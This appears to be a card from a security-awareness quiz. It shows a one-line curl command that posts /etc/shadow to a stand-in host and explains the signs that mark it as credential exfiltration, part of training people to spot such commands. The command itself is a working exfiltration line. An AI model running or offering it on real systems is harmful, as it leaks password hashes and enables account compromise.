curl -X POST --data-binary @/etc/shadow https://example.com/collect

linux · bash · Advanced

Uploads the file containing every local password hash to a remote server. The @ prefix tells curl to read the request body from a file, so recognising that one character is what distinguishes this from an ordinary API call.

Signals to notice

  • Reads /etc/shadow as the request body
  • Sends credential material off the host
  • @ prefix loads a local file into the upload

Think you can spot these under time pressure?
